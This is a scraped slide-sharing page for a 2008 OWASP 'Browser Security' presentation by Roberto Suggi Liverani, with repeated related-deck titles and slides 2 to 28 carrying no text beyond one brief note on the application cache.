Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 

Browser Security

  • 1. OWASP – Browser Security Roberto Suggi Liverani Security Consultant Security-Assessment.com 3 September 2008
  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.

Notas del editor

  1. Updateready-&gt; application cache is not the newest